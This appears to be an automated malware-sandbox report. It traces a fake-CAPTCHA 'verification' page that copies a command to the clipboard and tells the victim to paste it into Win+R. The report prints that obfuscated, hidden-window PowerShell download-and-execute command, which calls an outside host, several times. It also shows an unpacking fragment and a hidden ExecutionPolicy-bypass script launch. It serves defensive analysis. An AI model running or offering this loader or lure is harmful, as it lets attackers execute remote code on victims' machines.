Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Temp\PyEnv\python.exe	Section loaded: python311.dll	Jump to behavior
Source: C:\Temp\PyEnv\python.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Temp\PyEnv\python.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Temp\PyEnv\python.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Temp\PyEnv\python.exe	Section loaded: libffi-8.dll	Jump to behavior
Source: C:\Temp\PyEnv\python.exe	Section loaded: libcrypto-3.dll	Jump to behavior
Source: C:\Temp\PyEnv\python.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Temp\PyEnv\python.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Temp\PyEnv\python.exe	Section loaded: libssl-3.dll	Jump to behavior
Source: C:\Temp\PyEnv\python.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Temp\PyEnv\python.exe	Section loaded: python311.dll	Jump to behavior
Source: C:\Temp\PyEnv\python.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Temp\PyEnv\python.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Temp\PyEnv\python.exe	Section loaded: iphlpapi.dll	Jump to behavior

Source: C:\Temp\PyEnv\python.exe

File opened: C:\Temp\pyvenv.cfg

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

Directory created: C:\Program Files\Google\Chrome\Application\Dictionaries

Jump to behavior

Source:	Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2C71E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C758000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_elementtree.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2C813000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_zoneinfo.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2D5E1000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_decimal.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2C813000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_overlapped.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2D07F000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2C5C4000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: powershell.exe, 00000014.00000002.2430196928.0000025F2C5C4000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_multiprocessing.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2CE17000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2C5C4000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\select.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2C692000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2C813000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\python.pdb source: python.exe, 00000018.00000000.1975619284.00007FF70C492000.00000002.00000001.01000000.0000000B.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_msi.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2CDEB000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_decimal.pdb$$ source: powershell.exe, 00000014.00000002.2430196928.0000025F2C813000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2C813000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: powershell.exe, 00000014.00000002.2430196928.0000025F2CA53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CA31000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_asyncio.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2C7D1000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_uuid.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2D5CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D5B1000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\pyexpat.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2C692000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2D4B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D458000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2CA53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CA31000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2C813000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2D4CE000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2D4CE000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\python3.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2C412000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdbGCTL source: powershell.exe, 00000014.00000002.2430196928.0000025F2C5C4000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\winsound.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2C758000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2D57E000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Anti Malware Scan Interface: FromBase64String($TFlsgCfG))$obj = ConvertFrom-Json $json$paths = $obj.paths$data = $obj.data$up = Join-Path $Env:AppData 'Y4TFCR'[System.IO.Directory]::CreateDirectory($up) | Out-Nullfor ($i = 0; $i

Obfuscated command line found

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -W Hidden -c "$giv='h'+'ttp'+'s';$ad=':'+'//'+'weroos'+'.'+'com'+'/';$jl='SDk'+'wjk'+'.txt';$l=$giv+$ad+$jl;$sa='{0}{1}{2}' -f 'Net.','Web','Client';$c=New-Object ($sa);$v=$c.('Download'+'String')($l);$yd=[ScriptBlock]::Create($v);&$yd"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -W Hidden -c "$giv='h'+'ttp'+'s';$ad=':'+'//'+'weroos'+'.'+'com'+'/';$jl='SDk'+'wjk'+'.txt';$l=$giv+$ad+$jl;$sa='{0}{1}{2}' -f 'Net.','Web','Client';$c=New-Object ($sa);$v=$c.('Download'+'String')($l);$yd=[ScriptBlock]::Create($v);&$yd"			Jump to behavior

Suspicious powershell command line found

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -W Hidden -c "$giv='h'+'ttp'+'s';$ad=':'+'//'+'weroos'+'.'+'com'+'/';$jl='SDk'+'wjk'+'.txt';$l=$giv+$ad+$jl;$sa='{0}{1}{2}' -f 'Net.','Web','Client';$c=New-Object ($sa);$v=$c.('Download'+'String')($l);$yd=[ScriptBlock]::Create($v);&$yd"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -W Hidden -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Roaming\Y4TFCR\runme.ps1"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -W Hidden -c "$giv='h'+'ttp'+'s';$ad=':'+'//'+'weroos'+'.'+'com'+'/';$jl='SDk'+'wjk'+'.txt';$l=$giv+$ad+$jl;$sa='{0}{1}{2}' -f 'Net.','Web','Client';$c=New-Object ($sa);$v=$c.('Download'+'String')($l);$yd=[ScriptBlock]::Create($v);&$yd"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -W Hidden -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Roaming\Y4TFCR\runme.ps1"	Jump to behavior

Binary contains a suspicious time stamp

Source: vcruntime140_1.dll.20.dr

Static PE information: 0xFB76EAA0 [Mon Sep 10 13:35:28 2103 UTC]

PE file contains an invalid checksum

Source: cli.exe.24.dr	Static PE information: real checksum: 0x0 should be: 0x3aa1
Source: wheel.exe.24.dr	Static PE information: real checksum: 0x2a492 should be: 0x24951
Source: pip3.11.exe.24.dr	Static PE information: real checksum: 0x2a492 should be: 0x22fdc
Source: cli-arm64.exe.24.dr	Static PE information: real checksum: 0x0 should be: 0x79fa
Source: pip3.exe.24.dr	Static PE information: real checksum: 0x2a492 should be: 0x22fdc
Source: cli-32.exe.24.dr	Static PE information: real checksum: 0x0 should be: 0x3aa1
Source: cli-64.exe.24.dr	Static PE information: real checksum: 0x0 should be: 0x5e39
Source: pip.exe.24.dr	Static PE information: real checksum: 0x2a492 should be: 0x22fdc

PE file contains sections with non-standard names

Source: python311.dll.20.dr	Static PE information: section name: PyRuntim
Source: vcruntime140.dll.20.dr	Static PE information: section name: fothk
Source: vcruntime140.dll.20.dr	Static PE information: section name: _RDATA
Source: libcrypto-3.dll.20.dr	Static PE information: section name: .00cfg
Source: libssl-3.dll.20.dr	Static PE information: section name: .00cfg

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 19_2_00007FFF7F744764 push es; retf	19_2_00007FFF7F744767
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 19_2_00007FFF7F8E8AD0 pushad ; iretd	19_2_00007FFF7F8E8AD1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 19_2_00007FFF7F8E8A0B pushad ; iretd	19_2_00007FFF7F8E8A0C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 19_2_00007FFF7F8E8139 push ebx; ret	19_2_00007FFF7F8E813A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 19_2_00007FFF7F8E916C pushad ; iretd	19_2_00007FFF7F8E916D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 19_2_00007FFF7FBB69E9 push edi; ret	19_2_00007FFF7FBB69EA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 19_2_00007FFF7FBB69FC push edi; ret	19_2_00007FFF7FBB6A0A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 19_2_00007FFF7FBB6185 push ebx; ret	19_2_00007FFF7FBB61FA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 19_2_00007FFF7FBB4504 pushad ; ret	19_2_00007FFF7FBB4505
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 19_2_00007FFF7FBB5EC1 push ecx; ret	19_2_00007FFF7FBB5EDA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 19_2_00007FFF7FBB44C3 pushad ; ret	19_2_00007FFF7FBB44C4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 19_2_00007FFF7FBB22DD pushad ; ret	19_2_00007FFF7FBB2324
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 19_2_00007FFF7FBB5E84 push eax; ret	19_2_00007FFF7FBB5E85
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 19_2_00007FFF7FE4741E push cs; retf	19_2_00007FFF7FE4741F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 19_2_00007FFF7FE40FF9 pushfd ; ret	19_2_00007FFF7FE40FFD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 19_2_00007FFF7FE41887 push ds; ret	19_2_00007FFF7FE4189A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_00007FFF7F697418 push cs; retf	20_2_00007FFF7F69741F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_00007FFF7F697934 push ebx; retf	20_2_00007FFF7F69793A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_00007FFF7F835CC2 push esi; iretd	20_2_00007FFF7F835CC7
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_00007FFF7FBB5B40 push ebx; ret	20_2_00007FFF7FBB5B42
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_00007FFF7FBB5550 push ss; ret	20_2_00007FFF7FBB5565
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_00007FFF7FBB5B50 push ebp; ret	20_2_00007FFF7FBB5B62
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_00007FFF7FBB3EE8 push es; ret	20_2_00007FFF7FBB3EF0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_00007FFF7FBB5B09 push eax; ret	20_2_00007FFF7FBB5B0A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_00007FFF7FBB5B1D push ecx; ret	20_2_00007FFF7FBB5B22
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_00007FFF7FBB08CA push cs; ret	20_2_00007FFF7FBB08EA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_00007FFF7FBB5EC2 push ds; ret	20_2_00007FFF7FBB5EC4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_00007FFF7FBB0887 push cs; ret	20_2_00007FFF7FBB08EA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_00007FFF7FBB5E4C push ss; ret	20_2_00007FFF7FBB5E4E

Persistence and Installation Behavior

Detect drive by download via clipboard copy & paste

Source: Chrome DOM: 4.6

OCR Text: REGION SELECTOR It looks like you are visiting us from outside the IJS Would you prefer to access our dedicated Euro ean website, which offers tailored, region-specific in Complete these Verification Steps To better prove you are not a robot, please: Press & hold the Windows Key + R. 1. 2. In the verification window, press Ctrl + V. ENGLISH 3. Press Enter on your keyboard to finish. You will observe and agree: "1 at, not - reCAPTCHA Perfrm the steps above to VERIFY finish verification.

Found pyInstaller with non standard icon

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process created: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -W Hidden -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Roaming\Y4TFCR\runme.ps1"

HTML page adds supicious text to clipboard

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

Clipboard modification: powershell -W Hidden -c "$giv='h'+'ttp'+'s';$ad=':'+'//'+'weroos'+'.'+'com'+'/';$jl='SDk'+'wjk'+'.txt';$l=$giv+$ad+$jl;$sa='{0}{1}{2}' -f 'Net.','Web','Client';$c=New-Object ($sa);$v=$c.('Download'+'String')($l);$yd=[ScriptBlock]::Create($v);&$yd"

Drops PE files

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Temp\PyEnv\_msi.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Temp\PyEnv\_queue.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Temp\PyEnv\unicodedata.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Temp\PyEnv\_multiprocessing.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Temp\PyEnv\_hashlib.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Temp\PyEnv\_ssl.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Temp\PyEnv\python.exe	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Temp\PyEnv\python311.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Temp\PyEnv\_sqlite3.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Temp\PyEnv\_socket.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Temp\PyEnv\winsound.pyd	Jump to dropped file
Source: C:\Temp\PyEnv\python.exe	File created: C:\Temp\PyEnv\Lib\site-packages\setuptools\cli-arm64.exe	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Temp\PyEnv\select.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Temp\PyEnv\sqlite3.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Temp\PyEnv\libssl-3.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Temp\PyEnv\_ctypes.pyd	Jump to dropped file
Source: C:\Temp\PyEnv\python.exe	File created: C:\Temp\PyEnv\Lib\site-packages\setuptools\cli-32.exe	Jump to dropped file
Source: C:\Temp\PyEnv\python.exe	File created: C:\Temp\PyEnv\Scripts\pip3.11.exe	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Temp\PyEnv\_decimal.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Temp\PyEnv\_zoneinfo.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Temp\PyEnv\_asyncio.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Temp\PyEnv\_elementtree.pyd	Jump to dropped file
Source: C:\Temp\PyEnv\python.exe	File created: C:\Temp\PyEnv\Scripts\pip3.exe	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Temp\PyEnv\_uuid.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Temp\PyEnv\_lzma.pyd	Jump to dropped file
Source: C:\Temp\PyEnv\python.exe	File created: C:\Temp\PyEnv\Lib\site-packages\setuptools\cli.exe	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Temp\PyEnv\_overlapped.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Temp\PyEnv\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Temp\PyEnv\pythonw.exe	Jump to dropped file
Source: C:\Temp\PyEnv\python.exe	File created: C:\Temp\PyEnv\Scripts\wheel.exe	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Temp\PyEnv\vcruntime140_1.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Temp\PyEnv\_bz2.pyd	Jump to dropped file
